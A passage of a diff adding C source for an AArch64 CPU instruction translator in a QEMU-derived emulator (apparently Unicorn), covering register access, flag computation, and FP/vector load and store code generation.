+ gen_ss_advance(s); + gen_exception(s, EXCP_UDEF, syn_swstep(s->ss_same_el, 1, s->is_ldex)); + s->is_jmp = DISAS_EXC; +} + +static inline bool use_goto_tb(DisasContext *s, int n, uint64_t dest) +{ + /* No direct tb linking with singlestep (either QEMU's or the ARM + * debug architecture kind) or deterministic io + */ + if (s->singlestep_enabled || s->ss_active || (s->tb->cflags & CF_LAST_IO)) { + return false; + } + + /* Only link tbs from inside the same guest page */ + if ((s->tb->pc & TARGET_PAGE_MASK) != (dest & TARGET_PAGE_MASK)) { + return false; + } + + return true; +} + +static inline void gen_goto_tb(DisasContext *s, int n, uint64_t dest) +{ + TranslationBlock *tb; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + tb = s->tb; + if (use_goto_tb(s, n, dest)) { + tcg_gen_goto_tb(tcg_ctx, n); + gen_a64_set_pc_im(s, dest); + tcg_gen_exit_tb(tcg_ctx, (intptr_t)tb + n); + s->is_jmp = DISAS_TB_JUMP; + } else { + gen_a64_set_pc_im(s, dest); + if (s->ss_active) { + gen_step_complete_exception(s); + } else if (s->singlestep_enabled) { + gen_exception_internal(s, EXCP_DEBUG); + } else { + tcg_gen_exit_tb(tcg_ctx, 0); + s->is_jmp = DISAS_TB_JUMP; + } + } +} + +static void unallocated_encoding(DisasContext *s) +{ + /* Unallocated and reserved encodings are uncategorized */ + gen_exception_insn(s, 4, EXCP_UDEF, syn_uncategorized()); +} + +#define unsupported_encoding(s, insn) \ + do { \ + qemu_log_mask(LOG_UNIMP, \ + "%s:%d: unsupported instruction encoding 0x%08x " \ + "at pc=%016" PRIx64 "\n", \ + __FILE__, __LINE__, insn, s->pc - 4); \ + unallocated_encoding(s); \ + } while (0); + +static void init_tmp_a64_array(DisasContext *s) +{ +#ifdef CONFIG_DEBUG_TCG + int i; + for (i = 0; i < ARRAY_SIZE(s->tmp_a64); i++) { + TCGV_UNUSED_I64(s->tmp_a64[i]); + } +#endif + s->tmp_a64_count = 0; +} + +static void free_tmp_a64(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int i; + for (i = 0; i < s->tmp_a64_count; i++) { + tcg_temp_free_i64(tcg_ctx, s->tmp_a64[i]); + } + init_tmp_a64_array(s); +} + +static TCGv_i64 new_tmp_a64(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + assert(s->tmp_a64_count < TMP_A64_MAX); + return s->tmp_a64[s->tmp_a64_count++] = tcg_temp_new_i64(tcg_ctx); +} + +static TCGv_i64 new_tmp_a64_zero(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 t = new_tmp_a64(s); + tcg_gen_movi_i64(tcg_ctx, t, 0); + return t; +} + +/* + * Register access functions + * + * These functions are used for directly accessing a register in where + * changes to the final register value are likely to be made. If you + * need to use a register for temporary calculation (e.g. index type + * operations) use the read_* form. + * + * B1.2.1 Register mappings + * + * In instruction register encoding 31 can refer to ZR (zero register) or + * the SP (stack pointer) depending on context. In QEMU's case we map SP + * to tcg_ctx->cpu_X[31] and ZR accesses to a temporary which can be discarded. + * This is the point of the _sp forms. + */ +static TCGv_i64 cpu_reg(DisasContext *s, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (reg == 31) { + return new_tmp_a64_zero(s); + } else { + return tcg_ctx->cpu_X[reg]; + } +} + +/* register access for when 31 == SP */ +static TCGv_i64 cpu_reg_sp(DisasContext *s, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + return tcg_ctx->cpu_X[reg]; +} + +/* read a cpu register in 32bit/64bit mode. Returns a TCGv_i64 + * representing the register contents. This TCGv is an auto-freed + * temporary so it need not be explicitly freed, and may be modified. + */ +static TCGv_i64 read_cpu_reg(DisasContext *s, int reg, int sf) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 v = new_tmp_a64(s); + if (reg != 31) { + if (sf) { + tcg_gen_mov_i64(tcg_ctx, v, tcg_ctx->cpu_X[reg]); + } else { + tcg_gen_ext32u_i64(tcg_ctx, v, tcg_ctx->cpu_X[reg]); + } + } else { + tcg_gen_movi_i64(tcg_ctx, v, 0); + } + return v; +} + +static TCGv_i64 read_cpu_reg_sp(DisasContext *s, int reg, int sf) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 v = new_tmp_a64(s); + if (sf) { + tcg_gen_mov_i64(tcg_ctx, v, tcg_ctx->cpu_X[reg]); + } else { + tcg_gen_ext32u_i64(tcg_ctx, v, tcg_ctx->cpu_X[reg]); + } + return v; +} + +/* We should have at some point before trying to access an FP register + * done the necessary access check, so assert that + * (a) we did the check and + * (b) we didn't then just plough ahead anyway if it failed. + * Print the instruction pattern in the abort message so we can figure + * out what we need to fix if a user encounters this problem in the wild. + */ +static inline void assert_fp_access_checked(DisasContext *s) +{ +#ifdef CONFIG_DEBUG_TCG + if (unlikely(!s->fp_access_checked || !s->cpacr_fpen)) { + fprintf(stderr, "target-arm: FP access check missing for " + "instruction 0x%08x\n", s->insn); + abort(); + } +#endif +} + +/* Return the offset into CPUARMState of an element of specified + * size, 'element' places in from the least significant end of + * the FP/vector register Qn. + */ +static inline int vec_reg_offset(DisasContext *s, int regno, + int element, TCGMemOp size) +{ + int offs = offsetof(CPUARMState, vfp.regs[regno * 2]); +#ifdef HOST_WORDS_BIGENDIAN + /* This is complicated slightly because vfp.regs[2n] is + * still the low half and vfp.regs[2n+1] the high half + * of the 128 bit vector, even on big endian systems. + * Calculate the offset assuming a fully bigendian 128 bits, + * then XOR to account for the order of the two 64 bit halves. + */ + offs += (16 - ((element + 1) * (1 << size))); + offs ^= 8; +#else + offs += element * (1 << size); +#endif + assert_fp_access_checked(s); + return offs; +} + +/* Return the offset into CPUARMState of a slice (from + * the least significant end) of FP register Qn (ie + * Dn, Sn, Hn or Bn). + * (Note that this is not the same mapping as for A32; see cpu.h) + */ +static inline int fp_reg_offset(DisasContext *s, int regno, TCGMemOp size) +{ + int offs = offsetof(CPUARMState, vfp.regs[regno * 2]); +#ifdef HOST_WORDS_BIGENDIAN + offs += (8 - (1 << size)); +#endif + assert_fp_access_checked(s); + return offs; +} + +/* Offset of the high half of the 128 bit vector Qn */ +static inline int fp_reg_hi_offset(DisasContext *s, int regno) +{ + assert_fp_access_checked(s); + return offsetof(CPUARMState, vfp.regs[regno * 2 + 1]); +} + +/* Convenience accessors for reading and writing single and double + * FP registers. Writing clears the upper parts of the associated + * 128 bit vector register, as required by the architecture. + * Note that unlike the GP register accessors, the values returned + * by the read functions must be manually freed. + */ +static TCGv_i64 read_fp_dreg(DisasContext *s, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 v = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_ld_i64(tcg_ctx, v, tcg_ctx->cpu_env, fp_reg_offset(s, reg, MO_64)); + return v; +} + +static TCGv_i32 read_fp_sreg(DisasContext *s, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 v = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_ld_i32(tcg_ctx, v, tcg_ctx->cpu_env, fp_reg_offset(s, reg, MO_32)); + return v; +} + +static void write_fp_dreg(DisasContext *s, int reg, TCGv_i64 v) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_zero = tcg_const_i64(tcg_ctx, 0); + + tcg_gen_st_i64(tcg_ctx, v, tcg_ctx->cpu_env, fp_reg_offset(s, reg, MO_64)); + tcg_gen_st_i64(tcg_ctx, tcg_zero, tcg_ctx->cpu_env, fp_reg_hi_offset(s, reg)); + tcg_temp_free_i64(tcg_ctx, tcg_zero); +} + +static void write_fp_sreg(DisasContext *s, int reg, TCGv_i32 v) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_extu_i32_i64(tcg_ctx, tmp, v); + write_fp_dreg(s, reg, tmp); + tcg_temp_free_i64(tcg_ctx, tmp); +} + +static TCGv_ptr get_fpstatus_ptr(TCGContext *tcg_ctx) +{ + TCGv_ptr statusptr = tcg_temp_new_ptr(tcg_ctx); + int offset; + + /* In A64 all instructions (both FP and Neon) use the FPCR; + * there is no equivalent of the A32 Neon "standard FPSCR value" + * and all operations use vfp.fp_status. + */ + offset = offsetof(CPUARMState, vfp.fp_status); + tcg_gen_addi_ptr(tcg_ctx, statusptr, tcg_ctx->cpu_env, offset); + return statusptr; +} + +/* Set ZF and NF based on a 64 bit result. This is alas fiddlier + * than the 32 bit equivalent. + */ +static inline void gen_set_NZ64(TCGContext *tcg_ctx, TCGv_i64 result) +{ + TCGv_i64 flag = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_NE, flag, result, 0); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_ZF, flag); + tcg_gen_shri_i64(tcg_ctx, flag, result, 32); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_NF, flag); + tcg_temp_free_i64(tcg_ctx, flag); +} + +/* Set NZCV as for a logical operation: NZ as per result, CV cleared. */ +static inline void gen_logic_CC(TCGContext *tcg_ctx, int sf, TCGv_i64 result) +{ + if (sf) { + gen_set_NZ64(tcg_ctx, result); + } else { + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_ZF, result); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_NF, result); + } + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_CF, 0); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_VF, 0); +} + +/* dest = T0 + T1; compute C, N, V and Z flags */ +static void gen_add_CC(DisasContext *s, int sf, TCGv_i64 dest, TCGv_i64 t0, TCGv_i64 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (sf) { + TCGv_i64 result, flag, tmp; + result = tcg_temp_new_i64(tcg_ctx); + flag = tcg_temp_new_i64(tcg_ctx); + tmp = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_movi_i64(tcg_ctx, tmp, 0); + tcg_gen_add2_i64(tcg_ctx, result, flag, t0, tmp, t1, tmp); + + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_CF, flag); + + gen_set_NZ64(tcg_ctx, result); + + tcg_gen_xor_i64(tcg_ctx, flag, result, t0); + tcg_gen_xor_i64(tcg_ctx, tmp, t0, t1); + tcg_gen_andc_i64(tcg_ctx, flag, flag, tmp); + tcg_temp_free_i64(tcg_ctx, tmp); + tcg_gen_shri_i64(tcg_ctx, flag, flag, 32); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_VF, flag); + + tcg_gen_mov_i64(tcg_ctx, dest, result); + tcg_temp_free_i64(tcg_ctx, result); + tcg_temp_free_i64(tcg_ctx, flag); + } else { + /* 32 bit arithmetic */ + TCGv_i32 t0_32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 t1_32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_movi_i32(tcg_ctx, tmp, 0); + tcg_gen_trunc_i64_i32(tcg_ctx, t0_32, t0); + tcg_gen_trunc_i64_i32(tcg_ctx, t1_32, t1); + tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t0_32, tmp, t1_32, tmp); + tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); + tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0_32); + tcg_gen_xor_i32(tcg_ctx, tmp, t0_32, t1_32); + tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); + tcg_gen_extu_i32_i64(tcg_ctx, dest, tcg_ctx->cpu_NF); + + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, t0_32); + tcg_temp_free_i32(tcg_ctx, t1_32); + } +} + +/* dest = T0 - T1; compute C, N, V and Z flags */ +static void gen_sub_CC(DisasContext *s, int sf, TCGv_i64 dest, TCGv_i64 t0, TCGv_i64 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (sf) { + /* 64 bit arithmetic */ + TCGv_i64 result, flag, tmp; + + result = tcg_temp_new_i64(tcg_ctx); + flag = tcg_temp_new_i64(tcg_ctx); + tcg_gen_sub_i64(tcg_ctx, result, t0, t1); + + gen_set_NZ64(tcg_ctx, result); + + tcg_gen_setcond_i64(tcg_ctx, TCG_COND_GEU, flag, t0, t1); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_CF, flag); + + tcg_gen_xor_i64(tcg_ctx, flag, result, t0); + tmp = tcg_temp_new_i64(tcg_ctx); + tcg_gen_xor_i64(tcg_ctx, tmp, t0, t1); + tcg_gen_and_i64(tcg_ctx, flag, flag, tmp); + tcg_temp_free_i64(tcg_ctx, tmp); + tcg_gen_shri_i64(tcg_ctx, flag, flag, 32); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_VF, flag); + tcg_gen_mov_i64(tcg_ctx, dest, result); + tcg_temp_free_i64(tcg_ctx, flag); + tcg_temp_free_i64(tcg_ctx, result); + } else { + /* 32 bit arithmetic */ + TCGv_i32 t0_32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 t1_32 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tmp; + + tcg_gen_trunc_i64_i32(tcg_ctx, t0_32, t0); + tcg_gen_trunc_i64_i32(tcg_ctx, t1_32, t1); + tcg_gen_sub_i32(tcg_ctx, tcg_ctx->cpu_NF, t0_32, t1_32); + tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); + tcg_gen_setcond_i32(tcg_ctx, TCG_COND_GEU, tcg_ctx->cpu_CF, t0_32, t1_32); + tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0_32); + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_xor_i32(tcg_ctx, tmp, t0_32, t1_32); + tcg_temp_free_i32(tcg_ctx, t0_32); + tcg_temp_free_i32(tcg_ctx, t1_32); + tcg_gen_and_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_gen_extu_i32_i64(tcg_ctx, dest, tcg_ctx->cpu_NF); + } +} + +/* dest = T0 + T1 + CF; do not compute flags. */ +static void gen_adc(DisasContext *s, int sf, TCGv_i64 dest, TCGv_i64 t0, TCGv_i64 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 flag = tcg_temp_new_i64(tcg_ctx); + tcg_gen_extu_i32_i64(tcg_ctx, flag, tcg_ctx->cpu_CF); + tcg_gen_add_i64(tcg_ctx, dest, t0, t1); + tcg_gen_add_i64(tcg_ctx, dest, dest, flag); + tcg_temp_free_i64(tcg_ctx, flag); + + if (!sf) { + tcg_gen_ext32u_i64(tcg_ctx, dest, dest); + } +} + +/* dest = T0 + T1 + CF; compute C, N, V and Z flags. */ +static void gen_adc_CC(DisasContext *s, int sf, TCGv_i64 dest, TCGv_i64 t0, TCGv_i64 t1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (sf) { + TCGv_i64 result, cf_64, vf_64, tmp; + result = tcg_temp_new_i64(tcg_ctx); + cf_64 = tcg_temp_new_i64(tcg_ctx); + vf_64 = tcg_temp_new_i64(tcg_ctx); + tmp = tcg_const_i64(tcg_ctx, 0); + + tcg_gen_extu_i32_i64(tcg_ctx, cf_64, tcg_ctx->cpu_CF); + tcg_gen_add2_i64(tcg_ctx, result, cf_64, t0, tmp, cf_64, tmp); + tcg_gen_add2_i64(tcg_ctx, result, cf_64, result, cf_64, t1, tmp); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_CF, cf_64); + gen_set_NZ64(tcg_ctx, result); + + tcg_gen_xor_i64(tcg_ctx, vf_64, result, t0); + tcg_gen_xor_i64(tcg_ctx, tmp, t0, t1); + tcg_gen_andc_i64(tcg_ctx, vf_64, vf_64, tmp); + tcg_gen_shri_i64(tcg_ctx, vf_64, vf_64, 32); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_VF, vf_64); + + tcg_gen_mov_i64(tcg_ctx, dest, result); + + tcg_temp_free_i64(tcg_ctx, tmp); + tcg_temp_free_i64(tcg_ctx, vf_64); + tcg_temp_free_i64(tcg_ctx, cf_64); + tcg_temp_free_i64(tcg_ctx, result); + } else { + TCGv_i32 t0_32, t1_32, tmp; + t0_32 = tcg_temp_new_i32(tcg_ctx); + t1_32 = tcg_temp_new_i32(tcg_ctx); + tmp = tcg_const_i32(tcg_ctx, 0); + + tcg_gen_trunc_i64_i32(tcg_ctx, t0_32, t0); + tcg_gen_trunc_i64_i32(tcg_ctx, t1_32, t1); + tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t0_32, tmp, tcg_ctx->cpu_CF, tmp); + tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t1_32, tmp); + + tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); + tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0_32); + tcg_gen_xor_i32(tcg_ctx, tmp, t0_32, t1_32); + tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); + tcg_gen_extu_i32_i64(tcg_ctx, dest, tcg_ctx->cpu_NF); + + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, t1_32); + tcg_temp_free_i32(tcg_ctx, t0_32); + } +} + +/* + * Load/Store generators + */ + +/* + * Store from GPR register to memory. + */ +static void do_gpr_st_memidx(DisasContext *s, TCGv_i64 source, + TCGv_i64 tcg_addr, int size, int memidx) +{ + g_assert(size <= 3); + tcg_gen_qemu_st_i64(s->uc, source, tcg_addr, memidx, MO_TE + size); +} + +static void do_gpr_st(DisasContext *s, TCGv_i64 source, + TCGv_i64 tcg_addr, int size) +{ + do_gpr_st_memidx(s, source, tcg_addr, size, get_mem_index(s)); +} + +/* + * Load from memory to GPR register + */ +static void do_gpr_ld_memidx(DisasContext *s, TCGv_i64 dest, TCGv_i64 tcg_addr, + int size, bool is_signed, bool extend, int memidx) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGMemOp memop = MO_TE + size; + + g_assert(size <= 3); + + if (is_signed) { + memop += MO_SIGN; + } + + tcg_gen_qemu_ld_i64(s->uc, dest, tcg_addr, memidx, memop); + + if (extend && is_signed) { + g_assert(size < 3); + tcg_gen_ext32u_i64(tcg_ctx, dest, dest); + } +} + +static void do_gpr_ld(DisasContext *s, TCGv_i64 dest, TCGv_i64 tcg_addr, + int size, bool is_signed, bool extend) +{ + do_gpr_ld_memidx(s, dest, tcg_addr, size, is_signed, extend, + get_mem_index(s)); +} + +/* + * Store from FP register to memory + */ +static void do_fp_st(DisasContext *s, int srcidx, TCGv_i64 tcg_addr, int size) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* This writes the bottom N bits of a 128 bit wide vector to memory */ + TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); + tcg_gen_ld_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, fp_reg_offset(s, srcidx, MO_64)); + if (size < 4) { + tcg_gen_qemu_st_i64(s->uc, tmp, tcg_addr, get_mem_index(s), MO_TE + size); + } else { + TCGv_i64 tcg_hiaddr = tcg_temp_new_i64(tcg_ctx); + tcg_gen_qemu_st_i64(s->uc, tmp, tcg_addr, get_mem_index(s), MO_TEQ); + tcg_gen_ld_i64(tcg_ctx, tmp, tcg_ctx->cpu_env, fp_reg_hi_offset(s, srcidx)); + tcg_gen_addi_i64(tcg_ctx, tcg_hiaddr, tcg_addr, 8); + tcg_gen_qemu_st_i64(s->uc, tmp, tcg_hiaddr, get_mem_index(s), MO_TEQ); + tcg_temp_free_i64(tcg_ctx, tcg_hiaddr); + } + + tcg_temp_free_i64(tcg_ctx, tmp); +} + +/* + * Load from memory to FP register + */ +static void do_fp_ld(DisasContext *s, int destidx, TCGv_i64 tcg_addr, int size) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* This always zero-extends and writes to a full 128 bit wide vector */ + TCGv_i64 tmplo = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tmphi; + + if (size < 4) { + TCGMemOp memop = MO_TE + size; + tmphi = tcg_const_i64(tcg_ctx, 0); + tcg_gen_qemu_ld_i64(s->uc, tmplo, tcg_addr, get_mem_index(s), memop); + } else { + TCGv_i64 tcg_hiaddr; + tmphi = tcg_temp_new_i64(tcg_ctx); + tcg_hiaddr = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_qemu_ld_i64(s->uc, tmplo, tcg_addr, get_mem_index(s), MO_TEQ); + tcg_gen_addi_i64(tcg_ctx, tcg_hiaddr, tcg_addr, 8); + tcg_gen_qemu_ld_i64(s->uc, tmphi, tcg_hiaddr, get_mem_index(s), MO_TEQ); + tcg_temp_free_i64(tcg_ctx, tcg_hiaddr); + } + + tcg_gen_st_i64(tcg_ctx, tmplo, tcg_ctx->cpu_env, fp_reg_offset(s, destidx, MO_64)); + tcg_gen_st_i64(tcg_ctx, tmphi, tcg_ctx->cpu_env, fp_reg_hi_offset(s, destidx)); + + tcg_temp_free_i64(tcg_ctx, tmplo); + tcg_temp_free_i64(tcg_ctx, tmphi); +} + +/* + * Vector load/store helpers. + * + * The principal difference between this and a FP load is that we don't + * zero extend as we are filling a partial chunk of the vector register. + * These functions don't support 128 bit loads/stores, which would be + * normal load/store operations. + * + * The _i32 versions are useful when operating on 32 bit quantities + * (eg for floating point single or using Neon helper functions). + */ + +/* Get value of an element within a vector register */ +static void read_vec_element(DisasContext *s, TCGv_i64 tcg_dest, int srcidx, + int element, TCGMemOp memop) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int vect_off = vec_reg_offset(s, srcidx, element, memop & MO_SIZE); + switch (memop) { + case MO_8: + tcg_gen_ld8u_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + case MO_16: + tcg_gen_ld16u_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + case MO_32: + tcg_gen_ld32u_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + case MO_8|MO_SIGN: + tcg_gen_ld8s_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + case MO_16|MO_SIGN: + tcg_gen_ld16s_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + case MO_32|MO_SIGN: + tcg_gen_ld32s_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + case MO_64: + case MO_64|MO_SIGN: + tcg_gen_ld_i64(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + default: + g_assert_not_reached(); + } +} + +static void read_vec_element_i32(DisasContext *s, TCGv_i32 tcg_dest, int srcidx, + int element, TCGMemOp memop) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int vect_off = vec_reg_offset(s, srcidx, element, memop & MO_SIZE); + switch (memop) { + case MO_8: + tcg_gen_ld8u_i32(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + case MO_16: + tcg_gen_ld16u_i32(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + case MO_8|MO_SIGN: + tcg_gen_ld8s_i32(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + case MO_16|MO_SIGN: + tcg_gen_ld16s_i32(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + case MO_32: + case MO_32|MO_SIGN: + tcg_gen_ld_i32(tcg_ctx, tcg_dest, tcg_ctx->cpu_env, vect_off); + break; + default: + g_assert_not_reached(); + } +} + +/* Set value of an element within a vector register */ +static void write_vec_element(DisasContext *s, TCGv_i64 tcg_src, int destidx, + int element, TCGMemOp memop) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int vect_off = vec_reg_offset(s, destidx, element, memop & MO_SIZE); + CPUState *cs; + switch (memop) { + case MO_8: + tcg_gen_st8_i64(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); + break; + case MO_16: + tcg_gen_st16_i64(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); + break; + case MO_32: + tcg_gen_st32_i64(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); + break; + case MO_64: + tcg_gen_st_i64(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); + break; + default: + cs = CPU(s->uc->cpu); + cs->exception_index = EXCP_UDEF; + cpu_loop_exit(cs); + break; + } +} + +static void write_vec_element_i32(DisasContext *s, TCGv_i32 tcg_src, + int destidx, int element, TCGMemOp memop) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int vect_off = vec_reg_offset(s, destidx, element, memop & MO_SIZE); + switch (memop) { + case MO_8: + tcg_gen_st8_i32(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); + break; + case MO_16: + tcg_gen_st16_i32(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); + break; + case MO_32: + tcg_gen_st_i32(tcg_ctx, tcg_src, tcg_ctx->cpu_env, vect_off); + break; + default: + g_assert_not_reached(); + } +} + +/* Clear the high 64 bits of a 128 bit vector (in general non-quad + * vector ops all need to do this). + */ +static void clear_vec_high(DisasContext *s, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_zero = tcg_const_i64(tcg_ctx, 0); + + write_vec_element(s, tcg_zero, rd, 1, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_zero); +} + +/* Store from vector register to memory */ +static void do_vec_st(DisasContext *s, int srcidx, int element, + TCGv_i64 tcg_addr, int size) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGMemOp memop = MO_TE + size; + TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_tmp, srcidx, element, size); + tcg_gen_qemu_st_i64(s->uc, tcg_tmp, tcg_addr, get_mem_index(s), memop); + + tcg_temp_free_i64(tcg_ctx, tcg_tmp); +} + +/* Load from memory to vector register */ +static void do_vec_ld(DisasContext *s, int destidx, int element, + TCGv_i64 tcg_addr, int size) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGMemOp memop = MO_TE + size; + TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_qemu_ld_i64(s->uc, tcg_tmp, tcg_addr, get_mem_index(s), memop); + write_vec_element(s, tcg_tmp, destidx, element, size); + + tcg_temp_free_i64(tcg_ctx, tcg_tmp); +} + +/* Check that FP/Neon access is enabled. If it is, return + * true. If not, emit code to generate an appropriate exception, + * and return false; the caller should not emit any code for + * the instruction. Note that this check must happen after all + * unallocated-encoding checks (otherwise the syndrome information + * for the resulting exception will be incorrect). + */ +static inline bool fp_access_check(DisasContext *s) +{ + assert(!s->fp_access_checked); + s->fp_access_checked = true; + + if (s->cpacr_fpen) { + return true; + } + + gen_exception_insn(s, 4, EXCP_UDEF, syn_fp_access_trap(1, 0xe, false)); + return false; +} + +/* + * This utility function is for doing register extension with an + * optional shift. You will likely want to pass a temporary for the + * destination register. See DecodeRegExtend() in the ARM ARM. + */ +static void ext_and_shift_reg(TCGContext *tcg_ctx, TCGv_i64 tcg_out, TCGv_i64 tcg_in, + int option, unsigned int shift) +{ + int extsize = extract32(option, 0, 2); + bool is_signed = extract32(option, 2, 1); + + if (is_signed) { + switch (extsize) { + case 0: + tcg_gen_ext8s_i64(tcg_ctx, tcg_out, tcg_in); + break; + case 1: + tcg_gen_ext16s_i64(tcg_ctx, tcg_out, tcg_in); + break; + case 2: + tcg_gen_ext32s_i64(tcg_ctx, tcg_out, tcg_in); + break; + case 3: + tcg_gen_mov_i64(tcg_ctx, tcg_out, tcg_in); + break; + } + } else { + switch (extsize) { + case 0: + tcg_gen_ext8u_i64(tcg_ctx, tcg_out, tcg_in); + break; + case 1: + tcg_gen_ext16u_i64(tcg_ctx, tcg_out, tcg_in); + break; + case 2: + tcg_gen_ext32u_i64(tcg_ctx, tcg_out, tcg_in); + break; + case 3: + tcg_gen_mov_i64(tcg_ctx, tcg_out, tcg_in); + break; + } + } + + if (shift) { + tcg_gen_shli_i64(tcg_ctx, tcg_out, tcg_out, shift); + } +} + +static inline void gen_check_sp_alignment(DisasContext *s) +{ + /* The AArch64 architecture mandates that (if enabled via PSTATE + * or SCTLR bits) there is a check that SP is 16-aligned on every + * SP-relative load or store (with an exception generated if it is not). + * In line with general QEMU practice regarding misaligned accesses, + * we omit these checks for the sake of guest program performance. + * This function is provided as a hook so we can more easily add these + * checks in future (possibly as a "favour catching guest program bugs + * over speed" user selectable option). + */ +} + +/* + * This provides a simple table based table lookup decoder. It is + * intended to be used when the relevant bits for decode are too + * awkwardly placed and switch/if based logic would be confusing and + * deeply nested. Since it's a linear search through the table, tables + * should be kept small. + * + * It returns the first handler where insn & mask == pattern, or + * NULL if there is no match. + * The table is terminated by an empty mask (i.e. 